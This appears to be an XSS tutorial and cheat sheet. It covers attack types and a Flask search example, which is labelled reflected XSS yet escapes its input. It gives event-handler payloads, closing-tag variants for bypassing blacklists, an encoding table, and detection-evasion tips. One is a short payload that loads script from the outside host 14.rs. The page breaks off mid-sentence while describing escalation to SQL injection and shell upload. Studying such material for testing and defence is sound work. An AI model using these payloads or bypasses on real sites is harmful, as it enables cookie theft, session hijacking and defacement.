Cross-site scripting (XSS) is a vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users
What Is Vulnerability?
Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications. It allows attackers to inject malicious scripts into content from otherwise trusted websites. These scripts can then be executed in the context of the user's browser, leading to various potential attacks including data theft, session hijacking, and defacement of websites.
Types
Types of XSS Attacks
Stored XSS
Blind XSS
Reflected XSS
DOM XSS
Self XSS
How Does It Happen?
Reflected XSS
The malicious script is reflected off a web server, such as in an error message or a search result, and executed immediately as part of the response.
from flask import Flask, request, escape
app = Flask(__name__)
@app.route("/", methods=["GET"])
def search():
# Get the user input from the query parameters
qq = request.args.get("qq")
# Escape the user input to prevent XSS
result = f"Result Found {escape(qq)}" if qq else ""
# Create the HTML form with the result safely included
form_html = '''
<center>
<form action="" method="get">
<label aria-hidden="true">Search Anything</label>
<input type="text" name="qq" id="qq">
<input type="submit" value="Search">
</form>
<div>{}</div>
</center>
'''.format(result)
return form_html
if __name__ == "__main__":
app.run(debug=True)
<x onclick=confirm()>click here
<x ondrag=aconfirm()>drag it
Bypass tag blacklisting
</ScRipT>
</script
</script/>
</script x>
HTML
Char
Numeric
Description
Hex
CSS (ISO)
JS (Octal)
URL
"
"
"
quotation mark
u+0022
\0022
\42
%22
#
#
#
number sign
u+0023
\0023
\43
%23
$
$
$
dollar sign
u+0024
\0024
\44
%24
%
%
%
percent sign
u+0025
\0025
\45
%25
&
&
&
ampersand
u+0026
\0026
\46
%26
'
'
'
apostrophe
u+0027
\0027
\47
%27
(
(
(
left parenthesis
u+0028
\0028
\50
%28
)
)
)
right parenthesis
u+0029
\0029
\51
%29
*
*
*
asterisk
u+002A
\002a
\52
%2A
+
+
+
plus sign
u+002B
\002b
\53
%2B
,
,
,
comma
u+002C
\002c
\54
%2C
−
-
-
hyphen-minus
u+002D
\002d
\55
%2D
.
.
.
full stop; period
u+002E
\002e
\56
%2E
/
/
/
solidus; slash
u+002F
\002f
\57
%2F
:
:
:
colon
u+003A
\003a
\72
%3A
;
;
;
semicolon
u+003B
\003b
\73
%3B
<
<
<
less-than
u+003C
\003c
\74
%3C
=
=
=
equals
u+003D
\003d
\75
%3D
>
>
>
greater-than sign
u+003E
\003e
\76
%3E
?
?
?
question mark
u+003F
\003f
\77
%3F
@
@
@
at sign; commercial at
u+0040
\0040
\100
%40
[
[
[
left square bracket
u+005B
\005b
\133
%5B
\
\
\
backslash
u+005C
\005c
\134
%5C
]
]
]
right square bracket
u+005D
\005d
\135
%5D
^
^
^
circumflex accent
u+005E
\005e
\136
%5E
_
_
_
low line
u+005F
\005f
\137
%5F
`
`
`
grave accent
u+0060
\0060
\u0060
%60
{
{
{
left curly bracket
u+007b
\007b
\173
%7b
|
|
|
vertical bar
u+007c
\007c
\174
%7c
}
}
}
right curly bracket
u+007d
\007d
\175
%7d
Tips & Tricks
http(s):// can be shortened to // or /\\ or \\.
document.cookie can be shortened to cookie. It applies to other DOM objects as well.
alert and other pop-up functions don't need a value, so stop doing alert('XSS') and start doing alert()
You can use // to close a tag instead of >.
I have found that confirm is the least detected pop-up function so stop using alert.
Quotes around attribute value aren't necessary as long as it doesn't contain spaces. You can use <script src=//14.rs> instead of <script src="//14.rs">
The shortest HTML context XSS payload is <script src=//14.rs> (19 chars)
Escalating the Attack
XSS to SQL Injection (XSSQLi)
XSS Injection with SQLi (XSSQLi) Well After our discussion on different types of injection and places you can find SQL injection Vulnerability, an attacker can successfully exploit an SQL injection vulnerability and get access to the database and if he is lucky enough to get access to the File System also by uploading shell
